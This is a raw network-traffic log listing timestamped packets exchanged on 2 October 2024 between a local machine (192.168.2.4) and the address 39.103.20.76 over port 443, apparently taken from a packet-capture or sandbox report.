Oct 2, 2024 04:27:34.694789886 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.696494102 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.696557999 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.700367928 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.700448990 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.702207088 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.702285051 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.729965925 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.730042934 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.730081081 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.730143070 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.732355118 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.732429981 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.732443094 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.732500076 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.740089893 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.740163088 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.740191936 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.740257025 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.745714903 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.745807886 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.745830059 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.745836973 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.745867014 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.745894909 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.752032042 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.752119064 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.752125025 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.752156973 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.752187014 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.752216101 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.758382082 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.758472919 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.758511066 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.758580923 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.764673948 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.764751911 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.764817953 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.764878988 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.767812014 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.767893076 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.767900944 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.767926931 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.767956972 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.767981052 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.774094105 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.774183035 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.774183989 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.774208069 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.774243116 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.774266005 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.777349949 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.777436972 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.777466059 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.777538061 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.777630091 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.777698040 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.777730942 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.777793884 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.779031038 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.779098988 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.779138088 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.779200077 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.779906034 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.779973030 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.780011892 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.780069113 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.780611038 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.780673981 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.780735016 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.780801058 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.785609007 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.785681009 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.785690069 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.785712004 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.785752058 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.785774946 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.793750048 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.793827057 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.815834999 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.816045046 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.877372980 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.877592087 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.879765987 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.879858017 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.881836891 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.881916046 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.887670040 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.887763023 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.889662027 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.889744043 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.890703917 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.890774965 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.895760059 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.895838022 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.897300005 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.897387981 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.901902914 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.901982069 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.903485060 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.903557062 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.908332109 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.908401012 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.910319090 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.910393953 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.911358118 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.911434889 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.915663958 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.915735006 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.918982029 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.919044018 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.921951056 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.922017097 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.923664093 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.923723936 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.924242020 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.924299002 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.926775932 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.926845074 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.928021908 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.928075075 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.930393934 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.930447102 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.931626081 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.931689024 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.933789015 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.933847904 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.934972048 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.935029984 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.936191082 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.936259985 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.938528061 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.938601971 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.939670086 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.939750910 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.941875935 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.941937923 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.943100929 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.943165064 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.944250107 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.944314957 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.946561098 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.946630001 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.947741032 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.947813988 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.968316078 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.968363047 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.968409061 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.968416929 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.968441010 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.968461990 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.970639944 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.970690012 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.970711946 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.970717907 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.970760107 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.978672028 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.978745937 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.978780985 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.978849888 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.984196901 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.984237909 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.984270096 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.984276056 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.984297037 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.984322071 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.990406990 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.990447044 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.990483999 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.990489960 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.990525961 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.990549088 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.997289896 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.997334957 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.997369051 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.997375011 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:34.997405052 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:34.997443914 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.001240969 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.001277924 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.001322031 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.001328945 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.001354933 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.001379967 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.006681919 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.006737947 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.006755114 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.006759882 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.006798029 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.006820917 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.013062000 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.013109922 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.013142109 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.013154030 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.013190031 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.013211966 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.016714096 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.016760111 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.016782045 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.016792059 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.016828060 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.016849995 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.020250082 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.020294905 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.020311117 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.020319939 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.020349979 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.020374060 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.022622108 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.022661924 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.022691965 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.022697926 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.022737980 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.022759914 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.026114941 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.026166916 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.026195049 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.026201010 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.026247978 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.026273012 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.029520035 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.029562950 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.029603004 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.029608011 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.029659986 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.032974005 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.033041000 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.036338091 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.036422968 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.036436081 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.036498070 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.264203072 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.264295101 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.277477980 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.277663946 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.299109936 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.299309969 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.299506903 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.299571991 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.300801992 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.300862074 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.300884962 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.300940037 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.300987959 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.301043034 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.301641941 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.301696062 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.301717997 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.301773071 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.303446054 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.303499937 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.303881884 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.303926945 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.303937912 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.303944111 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.303977966 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.304004908 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.304241896 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.304301023 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.304759979 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.304824114 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.304879904 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.304934978 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.306160927 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.306215048 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.306768894 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.306828022 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.307307005 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.307349920 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.307363033 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.307368040 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.307401896 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.307430029 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.309254885 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.309302092 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.309323072 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.309329033 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.309359074 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.309382915 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.309817076 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.309873104 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.310293913 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.310354948 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.310775995 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.310818911 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.310832977 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.310839891 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.310869932 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.310897112 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.311788082 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.311850071 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.312705040 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.312763929 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.313848972 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.313935041 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.314429998 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.314512968 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.315013885 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.315093040 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.315479994 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.315548897 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.315884113 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.315948963 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.403090000 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.403136015 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.403183937 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.403191090 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.403218985 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.403242111 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.422219038 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.422285080 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.422342062 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.422348022 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.422382116 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.422405958 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.425719976 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.425781012 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.425864935 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.425915956 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.425985098 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.426039934 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.426048040 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.426094055 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.426105976 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.426110983 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.426142931 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.426163912 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.426214933 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.426268101 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.426270008 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.426284075 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.426325083 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.426599979 CEST	443	49740	39.103.20.76	192.168.2.4
